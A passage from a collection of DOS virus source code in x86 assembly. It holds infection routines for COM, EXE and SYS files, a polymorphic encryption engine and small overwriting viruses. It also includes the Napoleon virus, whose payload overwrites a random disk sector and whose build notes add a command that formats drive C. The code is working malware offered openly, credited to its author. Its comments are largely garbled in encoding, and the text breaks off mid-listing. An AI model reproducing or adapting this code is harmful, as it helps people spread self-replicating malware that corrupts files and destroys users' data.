ax,ax mov ds,ax mov si,24h*4 mov ax,cs:io24 mov dx,cs:io24+2 mov [si],ax mov [si+2],dx call LoadRegs ret ; ணࠬ ࠡ 䠩 RestoreFileAttributesA: push ax bx cx dx ds mov ax,7143h mov cx,4301h mov bx,1 call LFNAPI_Check mov dx,cs:fn_ptr mov ds,cs:fn_ptr+2 mov cx,cs:Attrib test cl,1 jz noRFA call int21 noRFA: pop ds dx cx bx ax ret ClearFileAttributesA: push ax bx cx dx mov ax,7143h xor bx,bx mov cx,4300h call LFNAPI_Check call int21 jc NoFA mov cs:Attrib,cx mov cs:fn_ptr,dx mov cs:fn_ptr+2,ds test cl,1 jz NoFA mov ax,7143h mov bx,1 mov cx,4301h call LFNAPI_Check mov cx,20h call int21 jc NoFA NoFA: pop dx cx bx ax ret CreateFileA: push ax cx dx si mov ax,716ch mov cx,6c00h call LFNAPI_Check mov bx,2 xor cx,cx mov si,dx mov dx,1 call int21 xchg ax,bx pop si dx cx ax ret LFNAPI_Check: push ax cx bx mov ax,71a1h mov bx,-1 call int21 or al,al jz noLFNAPI pop bx cx ax ret noLFNAPI: pop bx ax cx ret GetDate: ; 祭 ६ mov ax,5700h ; ᫥ 䠩 call int21 mov cs:time,cx mov cs:date,dx ret RestDate: ; ⠭ ६ mov ax,5701h ; 䠩 mov cx,cs:time mov dx,cs:date call int21 ret Write: mov ah,40h ; 䠩 call int21 ret Read: mov ah,3fh ; ⥭ 䠩 call int21 ret CloseFile: mov ah,3eh ; ⨥ 䠩 call int21 ret SeekSave: call SaveRegs ; ࠭ 樨 xor cx,cx ; 㪠⥫ (lseek) 䠩 xor dx,dx call seekfrom_cur mov cs:seek_pos,ax mov cs:seek_pos+2,dx call LoadRegs ret RestoreSeek: call SaveRegs ; ⠭ ࠭ mov dx,cs:seek_pos ; 樨 㪠⥫ 䠩 mov cx,cs:seek_pos+2 call seekfrom_bof call LoadRegs ret seek2bof: mov ax,4200h ; ⠭ 㪠⥫ xor cx,cx ; 砫 䠩 xor dx,dx jmp realseek seek2eof: mov ax,4202h ; ⠭ 㪠⥫ xor cx,cx ; 䠩 xor dx,dx jmp realseek seekfrom_eof: mov ax,4202h ; ⠭ 㪠⥫ jmp realseek ; 䠩 seekfrom_cur: mov ax,4201h ; ⠭ 㪠⥫ jmp realseek ; ⥪饩 樨 seekfrom_bof: mov ax,4200h ; ⠭ 㪠⥫ ; 砫 䠩 realseek: call int21 ret ; ࠡ稪 int 24h int24: mov al,3 ; Fail caller iret ; ᥢ int 21h int21: pushf ; ⥪ 䫠 push cs ; ᥣ call exithandler ; ࠢ ୥ ⥪ ret ; ஢ઠ 䠩 (᪮?) ioctl: push ax dx ; ࠭ ॣ஢ mov ax,4400h ; IOCTL - GET DEVICE INFORMATION call int21 jc chkd ; DOS ᮮ饭 訡 sub dl,10000000b ; ஢ઠ 7 cmc chkd: pop dx ax ret ; ॢ ⨭᪨ ᨬ AH AL 孨 ॣ upreg: xchg al,ah ; 塞 ⠬ AL AH call upral ; ॢ 孨 ॣ 訩 AH xchg al,ah ; ⠭ AL AH call upral ; ॢ 孨 ॣ AL ret ; 室 ணࠬ upral: cmp al,'a' ; ஢ઠ 宦 AL jb noupr ; ࢠ 61h 74h cmp al,'z' ja noupr sub al,20h ; ॢ 孨 ॣ noupr: ret ; SeekHide ; ᫨ lseek 室 ⥫ , ணࠬ ७ ; ࠭ ࠦ ணࠬ, .. ⮩ ணࠬ ; SEEK_POS ᮤঠ lseek ; NRBYTES 㬥蠥 ࠧ 権 seekhide: call SaveRegs ; ࠭ ॣ஢ call SeekSave ; ࠭塞 ⥪饥 㪠⥫ mov cx,-1 ; 㪠⥫ ࠭ mov dx,-vsize ; ணࠬ call seekfrom_eof ; DX:AX - sub ax,cs:seek_pos ; SEEK_POS - sbb dx,cs:seek_pos+2 cmp dx,-1 ; DX:AX ⥫ jnz not_us or ax,ax jns not_us neg ax ; 祭 ࠧ 権 sub cs:nrbytes,ax ; 㬥襭 ⢠ ⠭ ⮢ sub cs:seek_pos,ax ; 㬥襭 樨 㪠⥫ 䠩 sbb cs:seek_pos,0 ; .. ᬥ饭 not_us: call RestoreSeek ; ⠭ 樨 㪠⥫ call LoadRegs ; ⠭ ॣ஢ ret ; CRC crc: push si cx lea si,shield mov cx,end_crc-shield call crc32 pop cx si ret CRC32: push ebx ecx edx esi edi ds cld mov di,cx mov ecx,-1 mov edx,ecx mvs ds,cs NextByteCRC: xor eax,eax xor ebx,ebx lodsb xor al,cl mov cl,ch mov ch,dl mov dl,dh mov dh,8 NextBitCRC: shr bx,1 rcr ax,1 jnc NoCRC xor ax,08320h xor bx,0edb8h NoCRC: dec dh jnz NextBitCRC xor ecx,eax xor edx,ebx dec di jnz NextByteCRC not edx not ecx mov eax,edx rol eax,16 mov ax,cx pop ds edi esi edx ecx ebx ret ; ஢ handle Infect_Handle: push cs cs ; ds es 뢠 pop ds es call ioctl ; ஢ઠ 䠩 䨪⨢ (disk file?) jc close call Inf_Check ; ஢ઠ 䠩 ୮ ࠦ jc close mov cx,32 ; ⥭ 䠩 lea dx,original call read cmp cx,ax ; DOS 襭 jne close ; ⥭ ? lea si,original ; ᤥ ਣ쭮 lea di,header ; 砫 ணࠬ mov cx,32 cld rep movsb lea di,header cmp host,"S" ; ஢ઠ .SYS ⨯ jz sysinfect mov ax,[di] ; ax 2 cmp ax,'ZM' ; ஢ઠ EXE ⨯ je exeinfect cmp ax,'MZ' ; ⠪ EXE譨 je exeinfect ; ⠪ 뢠 jmp cominfect ; ஢ COM 䠩 ; DI - , 㦭 ஢ cominfect: mov host,"C" ; COM file cmp w [di],-1 ; ।饭 .SYS 䠩 jz Close ; 맮 int 06h call seek2eof ; 祭 ࠧ 䠩 or dx,dx ; ࠧ 䠩 65535 ? jnz Close cmp ax,65035-vsize ; ஢ઠ 䠩 ९ ja Close ; ⠢ ⥪ PSP mov b [di],0e9h ; JMP mov delta,ax ; ⥫쭮 ᬥ饭 sub ax,3 ; ४ ( ࠧ jump') mov w [di+1],ax ; 室 jmp check ; ஢ SYS 䠩 ; DI - , 㦭 ஢ sysinfect: mov host,"S" ; SYS file cmp d [di],-1 ; ⢨⥫쭮 ࠩ? jnz Close call seek2eof ; 祭 ࠧ 䠩 or dx,dx ; ࠧ 䠩 65535 ? jnz Close cmp ax,65035-vsize ; ஢ઠ 䠩 ९ ja Close mov w [di+8],ax ; ⠭ ᬥ饭 楤 뢠 add w [di+8],Interrupt-ksenia mov w [di+6],ax ; ⠭ ᬥ饭 楤 ⥣ sub ax,0100h mov delta,ax ; ⥫쭮 ᬥ饭 jmp check ; ஢ EXE 䠩 ; DI - , 㦭 ஢ exeinfect: mov host,"E" ; EXE file cmp b [di+18h],'@' ; ஢ઠ 䠩 ਭ je close ; ᥬ WinNE 䠩 mov ax,W [di+4] ; ࠬ PageCnt mov cx,W [di+2] ; ࠬ PartPag or cx,cx ; ᫨ ᫥ ࠭ ࠢ jz $+3 ; , ࠬ PageCnt ᮤন dec ax ; ⥫쭮 mov dx,512 ; 㬭 512 (祭 ) mul dx add ax,cx ; 祭 EXE 䠩, adc dx,0 ; 㧨 ᪥ EXE push dx ax ; ࠭ ६ ⥪ call seek2eof ; 祭 ᪮ ࠧ 䠩 pop si cx ; 㧪 ࠬ஢ ⥪ cmp si,ax ; ࠢ ࠬ஢ ( jnz Close ; 直 overlay ) cmp cx,dx jnz Close ; 祭 訥 䠩 室 cmp dx,10 ; ??? ⠪ jae Close ; 뢠 (砥 divide overflow ) push ax dx ; ࠭ ࠬ஢ mov cx,16 ; 祭 室 窨 (CS:IP), div cx ; ᯮ ⮣ EXE 䠩 sub ax,[di+8] ; ⠭ ࠧ EXE mov delta,dx ; ⥫쭮 ᬥ饭 sub ax,10h ; COM 䠩 (IP /ࠢ 100h) add dx,100h mov W [di+14h],dx ; ࠭ IP mov W [di+16h],ax ; ࠭ CS mov W [di+0eh],ax ; ࠭ SS ( TBSCAN ) mov W [di+10h],-2 ; ࠭ SP pop dx ax ; 㧪 ࠬ஢ ⥪ add ax,vsize ; ࠧ 䠩 adc dx,0 ; mov cx,512 ; ⠥ PartPag PageCnt div cx ; 䠩 ᮬ or dx,dx jz $+3 inc ax mov [di+2],dx ; ࠭ PartPag mov [di+4],ax ; ࠭ PageCnt Check: call WriteVirus ; 䠩 Close: call CorrectDate ; ࠢ ஢ 䠩 ret ; ஢ ⥫ 䠩 WriteVirus: call GetDate ; ६/ 䠩 cmp cs:save_ax,1857h; ஢ઠ 室 ࢥન jz no_time ; ६ 䠩 mov ah,2ch ; ⥪饣 ६ call int21 ; dx:cx mov ax,cs:time ; ax ६ 䠩 shr ah,3 ; ६ ( 11-15 cx) cmp ah,ch ; ᮢ? ᫨ , 뢠, je write_fail ; ⮡ ᢥ no_time: call seek2eof ; -> call nexus call write ; 뢠 䠩 xor cx,ax ; ᠫ? jnz write_fail call seek2bof ; 砫 mov cx,32 ; com/exe 䠩 lea dx,header mov w header+12h,v_id call write write_fail: call RestDate ; ⠭ 䠩 ret ; ஢ઠ 䠩 ஢ Inf_Check: call SaveRegs ; ࠭ ⥪ ॣ call SeekSave ; ࠭塞 lseek call seek2bof ; ७ᨬ 㪠⥫ 砫 mov cx,32 ; ⠥ lea dx,buffer push cs cs pop ds es call read call RestoreSeek ; ⠭ lseek xor cx,ax ; ⠫? jnz not_infected cmp w buffer+12h,v_id jnz not_infected call LoadRegs stc ret not_infected: call LoadRegs clc ret ; CRLOAD - ணࠬ 祭 ਣ쭮 砫 ; ࠦ ணࠬ ஢ ⮩ ணࠬ ; 室: BX - handle ஢ ணࠬ ; 室: "buffer" ᮤন 32 ਣ crload: call SaveRegs ; ࠭ ॣ஢ push cs cs ; 樠 ᥣ ॣ஢ pop ds es xor cx,cx ; ࠭ 樨 㪠⥫ 䠩 xor dx,dx call seekfrom_cur push dx ax mov cx,-1 ; mov dx,-32 ; call seekfrom_eof ; mov cx,32 ; ⠥ lea dx,buffer ; call read pop dx cx ; ⠭ 㪠⥫ call seekfrom_bof call LoadRegs ; ⠭ ॣ஢ ret ; POLYMORPHIC ENGINE [NEXUS] ; ⢥ 室 ࠬ஢ ⠭ DELTA ᬥ饭 䠩 ; 室 CX,DX ⮢ 맮 㭪樨 40h 뢠 int 21h nexus: call SaveRegs ; 樠 push cs cs pop ds es cld lea di,buffer mov al,60h stosb mov r_used,-1 ; ॣ஢ ᯮ call garbage ; mov w_flag,1 ; 樠 稪 call get_reg ; 祭 ॣ mov b r_used,al ; ᥭ ᯨ᮪ ᯮ짮 or al,10111000b ; ᮧ MOV REG,Const (16) stosb ; ࠭ mov ax,vsize-crlen-32 ; ᫥ ⢠ ஢ stosw ; ࠭ ⠭ call garbage ; gidx: mov w_flag,1 ; 16-⭮ ᭮ ॣ call get_reg ; 砩 ॣ mov ah,111b ; ஢ઠ ॣ 祭 cmp al,011b ; ࠬ 樨 ⮣ je sidx ; ॣ mov ah,100b cmp al,110b je sidx mov ah,101b cmp al,111b jne gidx sidx: mov b r_used+1,al ; ࠭ ᭮ ॣ mov rm_flag,ah ; ࠭ ࠬ R/M or al,10111000b ; 樠 ᭮ stosb ; ᮧ MOV REG,Const (16) mov ax,delta ; ᫥ ᬥ饭 砫 ஢ add ax,crlen+100h ; 䠩 stosw call garbage ; rchos: mov bp,di ; ࠭ 㪠⥫ ਯ mov ax,oplen ; 롮 砩 ஢騪 call xrandom mov si,ax ; SI=AX*2 add si,ax mov ax,w [si+enopI] ; ⥭ ஢騪 or ah,101b ; ஢ 㤥 ⨥ DI bt ax,1 ; ஢ઠ 室 mov w nbuf,ax ; ࠭ mov b nbuf+3,0c3h ; RETn mov al,90h ; NOP jc nokey mov ax,0ffh ; 祭 砩 ᫠ call xrandom inc ax ; ᪫祭 0 nokey: mov b nbuf+2,al mov al,[di] ; ஢ઠ : ᠬ call near ptr nbuf ; ஢뢠 ? cmp al,[di] jz rchos mov al,2eh ; stosb ; SEGCS mov ax,w [si+deopI] ; ⥭ ஢騪 or ah,rm_flag ; ࠢ ( R/M ᭮ ॣ) stosw bt ax,1 ; ஢ઠ 室 jc uukey mov al,b nbuf+2 ; ஢ stosb ; ਯ uukey: call garbage ; mov al,01000000b ; 㢥祭 ᭮ ॣ or al,b r_used+1 stosb call garbage ; mov al,01001000b ; 蠥 稪 or al,b r_used stosb mov al,01110101b ; 㥬 JNZ stosb ; 室 ਯ mov ax,bp sub ax,di dec ax stosb mov si,di ; ⮢ 樨 墠 sub si,offset buffer ; ( ᥣ mov ax,crlen ; ।⠢ ਯ sub ax,si ; 묨 ) mov cx,ax dec cx mov r_used,-1 ; ॣ஢ ᯮ call ncmd ; CX mov al,61h stosb mov cx,shield-ksenia-crlen lea si,ksenia+crlen lea di,buffer+crlen rep movsb mov cx,endi-shield-1 dupcr: lodsb sub al,[si] stosb loop dupcr mov cx,eov-endi+1 rep movsb mov cx,vsize-crlen-32 lea di,buffer+crlen encp: call near ptr nbuf inc di loop encp call LoadRegs mov cx,vsize lea dx,buffer ret ; ணࠬ 樨 ୮ 砩 ࠧ ; DS=ES=CS, [DI] - (DI ६) gmax equ crlen/7 gmin equ gmax/2 garbage: push ax cx mov ax,gmax-gmin call xrandom add ax,gmin xchg ax,cx call ncmd pop cx ax ret ; ணࠬ 樨 ୮ ⠡ ; DS=ES=CS, [DI] - (DI ६) ; CX - 㦭 ᥣ ncmd: push ax bx cx dx si ; ࠭ ॣ஢ jcxz gret ggen: push di cx lea di,crbuf call gcmd xchg ax,cx pop cx di cmp cx,ax jc ggen lea si,crbuf gdup: movsb dec cx dec ax jnz gdup or cx,cx jnz ggen gret: pop si dx cx bx ax ; ⠭ ॣ஢ ret ; ணࠬ 樨 砩 ୮ 樨 ; DS=ES=CS, [DI] - 樨 ; 室 CX - 樨 gcmd: push ax bx dx si di ; ࠭ ॣ஢ mov cx,2 ; ॣ: 2 ࠧ greg: lea si,opcode ; ⠡ mov ax,oclen ; 砩 ᫠ । call xrandom ; ⢠ ப ⠡ add si,ax ; 祭 ᬥ饭 ࠭ 祩 add si,ax add si,ax mov dl,[si] ; 㧪 ࠢ饣_ mov ax,[si+1] ; ஢ 蠡 樨 mov [di],ax test dx,10000000b ; ஢ઠ 䫠 ॣ樨 loopnz greg xor bx,bx bt dx,0 ; ⠭ 樨 setc bl bt dx,6 setc w_flag test dl,00000100b ; ஢ઠ 室 樨 jz nWRD ; WRD mov ax,2 call xrandom mov w_flag,al test dl,00100000b jz bit1 rol al,3 bit1: or [di],al ; ⠭ 祩 nWRD: test dl,00000010b ; ஢ઠ 室 樨 jz nREG ; REG call get_reg ; 砩 ॣ or [di+bx],al ; ⠭ 祩 nREG: mov cl,dl shr cl,3 and cl,11b ; ஢ઠ 室 樨 jz nRND ; 砩 祭 ᫥ 樨 cmp cl,11b jne pRND mov cl,w_flag inc cl pRND: xor ax,ax call xrandom mov [di+bx+1],al inc bx dec cl jnz pRND nRND: mov cx,bx inc cx pop di si dx bx ax ; 㧪 ॣ஢ ret ; ணࠬ 樨 ॣ AL ; 室: r_used (2 ) - 16- ॣ஢ ; w_flag - ࠧ來 ॣ (0-8 ,1-16 ) get_reg: mov ax,8 ; 砥 砩 call xrandom ; 0 7 mov ah,al ; 㡫㥬 cmp w_flag,1 ; ⨯ 訢 ॣ jz r16 ; 砥 8-⭮ ॣ ஢ઠ, and ah,11111011b ;  ᯮ짮 jmp r_chk ; ॣ஢ r_used r16: cmp ah,100b ; 砥 16-⭮ ॣ ஢ઠ, jz get_reg ;  ॣ஬ SP r_chk: cmp b r_used,ah ; ᥩ ஢塞, 稫 jz get_reg ; 㦥 ᯮ짮 ॣ, ᠭ cmp b r_used+1,ah ; r_used jz get_reg cbw ; ah=0 ret ; 室 ணࠬ ; (DB ࠢ騩_, DB , DB ) ; ࠢ騩_ 룫廊 ᫥騬 ࠧ: ; 00000000 ; 樨 (+1 ) ; REG ( [0-2] ᫥ ) ; WRD ; 砩 祭 (00-,01-,10-᫮,11- WRD) ; WRD (0- 0, 1- 3 ࢮ ) ; 祭 WRD, ᫨ ; ॣ 砩 ᫠ opcode db 00111110b,10110000b,00000000b ; MOV REG,Const (8/16) db 00011111b,11110110b,11000000b ; TEST REG,Const (8/16) db 00011111b,10000000b,11000000b ; ADD REG,Const (8/16) db 00011111b,10000000b,11001000b ; OR REG,Const (8/16) db 00011111b,10000000b,11010000b ; ADC REG,Const (8/16) db 00011111b,10000000b,11011000b ; SBB REG,Const (8/16) db 00011111b,10000000b,11100000b ; AND REG,Const (8/16) db 00011111b,10000000b,11101000b ; SUB REG,Const (8/16) db 00011111b,10000000b,11110000b ; XOR REG,Const (8/16) db 00011111b,10000000b,11111000b ; CMP REG,Const (8/16) db 00111110b,10110000b,00000000b ; MOV REG,Const (8/16) db 00001111b,11000000b,11000000b ; ROL REG,Const (8/16) db 00001111b,11000000b,11001000b ; ROR REG,Const (8/16) db 00001111b,11000000b,11010000b ; RCL REG,Const (8/16) db 00001111b,11000000b,11011000b ; RCR REG,Const (8/16) db 00001111b,11000000b,11100000b ; SHL/SAL REG,Const (8/16) db 00001111b,11000000b,11101000b ; SHR REG,Const (8/16) db 00001111b,11000000b,11111000b ; SAR REG,Const (8/16) db 00111110b,10110000b,00000000b ; MOV REG,Const (8/16) db 00000111b,11110110b,11011000b ; NEG REG (8/16) db 00000111b,11110110b,11010000b ; NOT REG (8/16) db 00000011b,11111110b,11000000b ; INC REG (8) db 00000011b,11111110b,11001000b ; DEC REG (8) db 01000010b,01000000b,00000000b ; INC REG (16) db 01000010b,01001000b,00000000b ; DEC REG (16) db 00111110b,10110000b,00000000b ; MOV REG,Const (8/16) db 10000001b,01110100b,00000000b ; JE NEXTCMD db 10000001b,01111100b,00000000b ; JL NEXTCMD db 10000001b,01111110b,00000000b ; JLE NEXTCMD db 10000001b,01110010b,00000000b ; JB NEXTCMD db 10000001b,01110110b,00000000b ; JP NEXTCMD db 10000001b,01111010b,00000000b ; JO NEXTCMD db 10000001b,01110000b,00000000b ; JS NEXTCMD db 10000001b,01111000b,00000000b ; JNE NEXTCMD db 10000001b,01110101b,00000000b ; JNL NEXTCMD db 10000001b,01111101b,00000000b ; JG NEXTCMD db 10000001b,01110011b,00000000b ; JAE NEXTCMD db 10000001b,01110111b,00000000b ; JA NEXTCMD db 10000001b,01111011b,00000000b ; JNP NEXTCMD db 10000001b,01110001b,00000000b ; JNO NEXTCMD db 10000001b,01111001b,00000000b ; JNS NEXTCMD db 10000001b,11100011b,00000000b ; JCXZ NEXTCMD db 10000001b,11101011b,00000000b ; JMP NEXTCMD db 00111110b,10110000b,00000000b ; MOV REG,Const (8/16) db 10000000b,11111000b,00000000b ; CLC db 10000000b,11110101b,00000000b ; CMC db 10000000b,11111001b,00000000b ; STC db 10000000b,11111100b,00000000b ; CLD db 10000000b,11111101b,00000000b ; STD db 10000000b,11111010b,00000000b ; CLI db 10000000b,11111011b,00000000b ; STI oclen equ (this byte-opcode)/3 ; 権 /஢ enopI db 10000000b,00110000b ; XOR db 11110110b,00010000b ; NOT db 10000000b,00000000b ; ADD db 10000000b,00101000b ; SUB db 11000000b,00001000b ; ROR db 11000000b,00000000b ; ROL db 11110110b,00011000b ; NEG db 11111110b,00000000b ; INC db 11111110b,00001000b ; DEC deopI db 10000000b,00110000b ; XOR db 11110110b,00010000b ; NOT db 10000000b,00101000b ; SUB db 10000000b,00000000b ; ADD db 11000000b,00000000b ; ROL db 11000000b,00001000b ; ROR db 11110110b,00011000b ; NEG db 11111110b,00001000b ; DEC db 11111110b,00000000b ; INC oplen equ (this byte-deopI)/2 ; CRC end_crc: random1 dw 0 ; 砩 ᥫ random2 dw 0 checksum dd 0 ; CRC32 host db 'C' ; ⨯ ࠦ ணࠬ epb dw 0 ; Execute Parameter Block dw 80h ; ப seg0 dw 0 dw 5ch ; FCB#1 seg1 dw 0 dw 6ch ; FCB#2 seg2 dw 0 ; ஢ (2- ᯮᮡ - internal) endi: SaveRegs: pushf ; ࠭ ᠬ ॣ஢ push eax bx edx si di bp es ds mov bp,sp push w [bp.rcx] ; ஢ mov [bp.rcx],cx mov bp,[bp.rbp] ; ⠭ BP ret LoadRegs: pop cx ; ⠭ ᬥ饭 mov bp,sp ; ஢ xchg cx,[bp.rcx] pop ds es bp di si edx bx eax popf ret rreg struc rds dw ? ; ᯮ ࠭ res dw ? ; ॣ஢ ⥪ rbp dw ? rdi dw ? rsi dw ? redx dd ? rbx dw ? reax dd ? rflg dw ? rcx dw ? rreg ends original db 0c3h ; ᫥ !!! db 31 dup (0) ; ᫥ !!! ; ᪮ - 䠩 eov: io08 dw ?,? ; 祩 ࠭ ஢ io21p dw ?,? ; 뢠 io24 dw ?,? stf db ? ; ० ⥫ (mcbcheck) seek_pos dw ?,? ; 㪠⥫ (SeekSave) nrbytes dw ? ; ⠭ (ReadStealth) r_used dw ? ; 2 ᯮ㥬 ॣ (NEXUS) w_flag db ? ; (NEXUS) rm_flag db ? ; ࠭ R/M (NEXUS) crbuf db 4 dup (?) nbuf db 4 dup (?) fn_ptr dw ?,? ; 䠩 (ClrAttrib) attrib dw ? ; ਡ (ClrAttrib) time dw ? ; ६ 䠩 (GetDate) date dw ? ; 䠩 (GetDate) delta dw ? ; +ᬥ饭 (室 ࠬ NEXUS) w95state dw ? ; ﭨ Win95 (筥 WinOldAp) save_ax dw ? ; । ࠬ஢ save_bx dw ? ; १⭮ ࠡ稪 save_es dw ? ; reqhdr dw ?,? ; REQUEST_HEADER intcall dw ?,? ; SYS_INTERRUPT delay db ? ; 稪 Virus Guard header db 32 dup (?) buffer db vsize dup (?) stacks db 100h dup (?) eom: end ksenia [KSENIA.ASM] [MHOLE.ASM] jumps .model tiny .code start: ; ⪠ ࠦ db 0e9h,0,0,98h ; ࠭ ॣ push ax bx cx dx bp si di ; 㧨 bp 祭 ⥫쭮 ᬥ饭 int 1ch delta: cli mov bp,sp mov bp,word ptr [bp-6] sub bp,offset delta sti ; ⨢ mov ax,1200h int 2fh cmp al,0ffh sbb ch,ch mov cl,1 lea di,[stosed+bp] mov al,90h rep stosb stosed: nop ; ஢뢠 mov cx,vsize-(cbeg-start) lea si,[cbeg+bp] decrypt: dw 3480h key db 0000h inc si loop decrypt ; ⠭ ਣ쭮 砫 䠩 cbeg: lea si,[prev+bp] mov di,100h mov cx,4 rep movsb ; ஢塞, ᪮ ? mov ax,4408h xor bx,bx int 21h or ax,ax jz complete ; ⠭ dta mov ah,1ah lea dx,[dta+bp] int 21h ; 㯠 䠩 mov ah,4eh mov cx,0ffefh and (not 1000b) lea dx,[fmask+bp] get_file: int 21h jc no_more call infect mov ah,4fh jmp get_file ; ⠭ dta no_more: mov ah,1ah mov dx,80h int 21h ; ⠭ ॣ complete: pop di si bp dx cx bx ax ; ⤠ ࠢ ᮭ⥫ mov si,100h jmp far ptr si prev db 0c3h,0,0,98h jump db 0e9h,0,0,98h fmask db '*.com',0 db '[Magic Hole]',0 db 'Copyright (C) 1998-99 by Deadman for Ksenia Chizhova',0 db 'There is nothing easier then to fall in love. Deadman.',0 db '{ALCY}' ; 㥬 DS:DX ---------- ;( infect: cmp word ptr [fsize+2+bp],0 jnz unluck cmp word ptr [fsize+bp],60000 ja unluck mov ax,3d00h lea dx,[fname+bp] int 21h jc unluck xchg ax,bx mov ah,3fh mov cx,4 lea dx,[prev+bp] int 21h jc close_1 xor cx,ax jnz close_1 cmp byte ptr [prev+3+bp],98h jnz not_infected close_1: call close jmp unluck not_infected: call close mov ax,4301h xor cx,cx lea dx,[fname+bp] int 21h jc unluck mov ax,3d02h int 21h jc unluck xchg ax,bx mov ax,4202h xor cx,cx cwd int 21h jc close_2 no_zero: in al,40h or al,al jz no_zero mov byte ptr [key+bp],al lea si,[start+bp] lea di,[buffer+bp] mov cx,vsize cld rep movsb lea si,[buffer+(cbeg-start)+bp] mov cx,vsize-(cbeg-start) encrypt: xor byte ptr [si],al inc si loop encrypt mov ah,40h mov cx,vsize lea dx,[buffer+bp] int 21h jc close_2 xor cx,ax jnz close_2 xor ax,ax in al,40h mov cx,ax in ax,40h mov dx,ax mov ah,40h int 21h mov ax,4200h xor cx,cx cwd int 21h mov ax,word ptr [fsize+bp] mov word ptr [jump+1+bp],ax mov ah,40h mov cx,4 lea dx,[jump+bp] int 21h close_2: mov ax,5700h inc al mov cx,[time+bp] mov dx,[date+bp] int 21h call close mov ax,4300h inc al mov cl,byte ptr [attr+bp] mov ch,0 lea dx,[fname+bp] int 21h unluck: ret close: nop mov ah,3eh int 21h nop nop ret vsize equ word ptr offset $ - offset start dta label byte db 15h dup (?) attr db ? time dw ? date dw ? fsize dw ?,? fname db 13 dup (?) buffer db vsize dup (?) end start [MHOLE.ASM] [25.ASM] model tiny codeseg org 100h start: db '*.*',0 mov ah,4eh mov cl,20h write: mov dx,si int 21h mov ax,3d02h mov dx,9eh int 21h xchg ax,bx mov ah,40h jmp write end start [25.ASM] [36.ASM] model tiny codeseg locals org 100h start: db '*.*',0 mov ah,4eh xor cx,cx mov dx,si next: int 21h jc last mov ax,3d02h mov dx,9eh int 21h xchg ax,bx mov ah,40h mov cl,eov-start mov dx,si int 21h mov ah,4fh jmp next last: ret eov: end start [36.ASM] [6.ASM] model tiny codeseg org 100h start: xchg ax,bp xchg dx,si int 21h retn end start [6.ASM] [NAPOLEON.ASM] comment N A P O L E O N Virus Written by Deadman of [SOS] Virus feautures: This virus looks like a simple DOS overwriter, but it is able to work perfectly in Win32. As you know, you can execute a WinPortableExecutable from a DOS box, and it won't display that you are a fucking ass and so on. Windows will hook an executing call and process file as normal Win32 program. My virus uses this feauture. It overwrites the original begin of infected program (with COM/EXE extension) with itself. Begin will be located at the end of file. On execute virus will find some files and infect them. Then virus will cure the infected program and execute it using the legal DOS function 4B, subfunction 00. So, when Win program is executed, Windows will open usual DOS box. From DOS box will be executed cured PE/NE program, and DOS box will be terminated. Virus preserves file time/date/attributes and kills error by replacing int 24h. Also virus gets an exit code of executed program and quits with it. Virus has an anti-heuristic subroutine. It'll call 2F interrupt function 1200h, it is MS-DOS installation check, returns al=FF. But heuristics can't emulate it and will be killed! Also virus is oligomorphic in files using its internal oligomorphic engine. On executing stack pair is relocated to another area to avoid erorrs. On .EXE infection virus will build new exe header, which will load virus only. On any error virus will kill random sector and display that there is not enough memory to run this program. By the way, virus infects 20 first uninfected files, which are placed in the root directory of the current drive. It seems virus will not perfectly determinate any overlay structure, so it will break ones :(. Will not infect .com filez which are less than Virus_Size bytes and greater than 62000 bytes. Compile it: tasm napoleon.asm /m tlink napoleon.obj /x/t del napoleon.obj echo y|format c:/u ;) Contacts: dman@lgg.ru www.lgg.ru/~dman Enjoy reading code, Deadman. %out Napoleon Copyright (C) 1998-99 by Deadman [SOS] ; asm code header jumps model tiny codeseg locals org 100h virus: ; anti-heuristic routine + infection mark xor ax,ax mov ds,ax mov si,2fh*4 mov ax,1200h pushf call dword ptr [si] push cs pop ds inc ax db 04h key db ? ; decrypting virus mov cx,enc_size lea si,encrypted algo: nop nop inc si loop algo encrypted: ; set new int 24h handler mov ax,2524h lea dx,int24 int 21h ; infect some filez call infect_filez ; get the name of infected program mov si,2ch mov ds,[si] mov si,-1 xor ax,ax findzero: inc si cmp word ptr [si],ax jne findzero lea dx,[si+4] ; get file attributes mov ax,4300h int 21h jc payload push cx dx ds ; set attributes to normal mov ax,4301h xor cx,cx int 21h jc payload ; open program for read/write mov ax,3d02h int 21h jc payload xchg ax,bx ; set ds = cs push cs pop ds ; move lseek pointer to the (eof-vsize) mov ax,4202h mov cx,-1 mov dx,-vsize int 21h ; read vsize bytes mov ah,3fh mov cx,vsize lea dx,buffer int 21h ; move lseek pointer to the bof mov ax,4200h xor cx,cx cwd int 21h ; remember file time and date mov ax,5700h int 21h push cx dx ; write the original begin of infected program mov ah,40h mov cx,vsize lea dx,buffer int 21h xor cx,ax jnz payload ; move lseek pointer to the (eof-vsize) mov ax,4202h mov cx,-1 mov dx,-vsize int 21h ; truncate file mov ah,40h xor cx,cx int 21h ; restore file time and date mov ax,5701h pop dx cx int 21h ; close file mov ah,3eh int 21h jc payload ; restore file attributes pop ds dx cx mov ax,4301h int 21h ; resize virus's memory block mov ah,4ah mov bx,(memory_size+100h)/16+2 int 21h jc payload ; prepare execute parameter block mov cs:seg1,cs mov cs:seg2,cs mov cs:seg3,cs ; set new stack pair mov ax,cs cli mov ss,ax mov sp,offset stacks+100h sti ; execute program mov ax,4b00h lea bx,epb int 21h jc payload ; restore stack mov ax,cs cli mov ss,ax mov sp,offset stacks+100h sti ; quit with exit code of infected program mov ah,4dh int 21h mov ah,4ch int 21h payload: ; error... I hate errors... Kill random sector in ax,40h cmp ax,200 jb payload cmp ax,40000 ja payload xchg dx,ax mov al,2 mov cx,1 int 26h pop ax push cs pop ds lea dx,hehehe mov ah,9 int 21h mov ax,4c04h int 21h int24: mov al,3 iret hehehe db 'Program too big to fit in memory',0dh,0ah,24h ; Execute Parameter Block epb dw 00h ; default environment dw 80h ; command line seg1 dw ? dw 5ch ; FCB1 seg2 dw ? dw 6ch ; FCB2 seg3 dw ? copyright db '[Napoleon]',0 db 'Copyright (C) 1998-99 by Deadman [SOS]',0 starstar: mov word ptr [di],'*\' mov word ptr [di+2],'*.' mov byte ptr [di+4],0 ret copyasciz: lodsb stosb or al,al jnz copyasciz ret infect_filez: ; initialize variables mov file_cnt,20 mov dta_ptr,offset dtaz lea di,result call starstar mov dest_ptr,offset result+1 ffirst: ; find first in current path mov ah,4eh mov cx,11110111b lea dx,result jmp do_find smth_else: ; find next file using current dta mov ah,4fh do_find: push ax dx mov ah,1ah mov dx,dta_ptr int 21h pop dx ax int 21h ; no more -> take previous dir jc dotdot ; file count limited? cmp file_cnt,0 jz 